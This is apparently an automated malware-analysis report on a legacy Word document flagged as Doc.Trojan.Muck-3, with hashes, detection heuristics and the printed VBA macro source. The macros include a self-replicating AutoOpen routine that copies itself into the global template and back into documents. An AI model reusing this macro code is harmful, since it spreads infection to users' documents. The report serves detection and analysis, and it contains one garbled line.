Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 497e4bbef409d8e8…

MALICIOUS

Office (OLE)

39.0 KB Created: 1997-04-26 16:26:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: ab9a637c4e4f31c4e9ebd8dc5e140cac SHA-1: cc0206fedeea827ca853c8a28f257be06ac5f1a6 SHA-256: 497e4bbef409d8e8f7f964ffebec68645bbf35412f86fae7c25522858c83ecc2
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains legacy WordBasic macro virus markers and VBA macros, including AutoOpen and AutoClose, which are indicative of older malware attempting to infect templates. The script attempts to copy these macros to the global template, suggesting an intent to achieve persistence and potentially spread to other documents. The presence of 'Wazzu' as a marker further supports the legacy macro virus classification.

Heuristics 5

  • ClamAV: Doc.Trojan.Muck-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Muck-3
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5687 bytes
SHA-256: 056cdafe071f4217d7752e84ffe87c1cb0d6adba751e232947eaf089d5dfc1b2
Detection
ClamAV: Doc.Trojan.Muck-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Wazzu Virus Protection.  Used to install the Autoexec macro."
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoOpen.MAIN"
Dim ExecuteOnly
On Error Resume Next
WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoOpen", "Global:AutoOpen", ExecuteOnly
WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoClose", "Global:AutoClose", ExecuteOnly
WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoNew", "Global:AutoNew", ExecuteOnly
WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoExit", "Global:AutoExit", ExecuteOnly
WordBasic.MacroCopy WordBasic.[FileName$]() + ":FileSave", "Global:FileSave", ExecuteOnly
WordBasic.MacroCopy WordBasic.[FileName$]() + ":FileSaveAs", "Global:FileSaveAs", ExecuteOnly


WordBasic.MacroCopy "Global:AutoOpen", WordBasic.[FileName$]() + ":AutoOpen", ExecuteOnly
WordBasic.MacroCopy "Global:AutoClose", WordBasic.[FileName$]() + ":AutoClose", ExecuteOnly
WordBasic.MacroCopy "Global:AutoNew", WordBasic.[FileName$]() + ":AutoNew", ExecuteOnly
WordBasic.MacroCopy "Global:AutoExit", WordBasic.[FileName$]() + ":AutoExit", ExecuteOnly
WordBasic.MacroCopy "Global:FileSave", WordBasic.[FileName$]() + ":FileSave", ExecuteOnly
WordBasic.MacroCopy "Global:FileSaveAs", WordBasic.[FileName$]() + ":FileSaveAs", ExecuteOnly
WordBasic.FileSaveAll 1
End Sub

Attribute VB_Name = "AutoClose"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Installed to your NORMAL template as AutoClose to clean the prank macros from any documents that you open then close."
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoClose.MAIN"
End Sub

Attribute VB_Name = "AutoNew"

Public Sub MAIN()
Attribute MAIN.VB_Description = "When creating a new document this macro shows the IMI toolbar, maximizes the document, and zooms to fit page width."
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoNew.MAIN"
Dim IsThereAnIni$
Dim Win$
Dim Platform$
Dim TitleBox$
Dim Copyright$
Dim StartupScreen$
Dim x
Dim Checked
    
Rem MAXIMIZE And SHOW TOOLBAR


UM DRRmemorWordBasic.ViewToolbars Toolbar:="IMI", Show:=1
WordBasic.DocMaximize 1
WordBasic.ViewZoom AutoFit:=1

On Error Resume Next

Rem MAKE INFOMAP.INI If IT DOES Not EXIST
IsThereAnIni$ = WordBasic.[GetPrivateProfileString$]("Word6", "StartupScreen", "InfoMap.ini")

If IsThereAnIni$ = "" Then WordBasic.SetPrivateProfileString "Word6", "StartupScreen", "On", "InfoMap.ini"

Rem DETERMINE PLATFORM For VERSION DISPLAY
Win$ = WordBasic.[GetSystemInfo$](21)

If Win$ = "Windows" Then Platform$ = "Windows" Else Platform$ = "Macintosh"

TitleBox$ = "Version 1.2 for " + Platform$

Copyright$ = "© 1994, Information Mapping, Inc.,  Waltham, MA.  All rights reserved."

Rem SET UP DIALOG BOX
WordBasic.BeginDialog 590, 269, TitleBox$
    WordBasic.Picture 13, 6, 567, 211, "LOGO", 1, "Picture1"
    WordBasic.Text 19, 251, 550, 13, Copyright$, "Text1"
    WordBasic.OKButton 416, 218, 88, 21
    WordBasic.CheckBox 25, 224, 236, 16, "Disable this startup screen.", "CheckBox1"
WordBasic.EndDialog

Dim dlg As Object: Set dlg = WordBasic.CurValues.UserDialog

WordBasic.CurValues.UserDialog dlg

StartupScreen$ = WordBasic.[GetPrivateProfileString$]("Word6", "StartupScreen", "InfoMap.ini")

If StartupScreen$ = "On" Then x = WordBasic.Dialog.UserDialog(dlg)

Checked = dlg.CheckBox1

If Checked = 1 Then WordBasic.SetPrivateProfileString "Word6", "StartupScreen", "Off", "InfoMap.ini"

End Sub

Attribute VB_Name = "FileSave"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Saves the active document or template"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileSave.MAIN"
Dim ExecuteOnly
On Error Resume Next
WordBasic.FileSave
WordBasic.FileSa
... (truncated)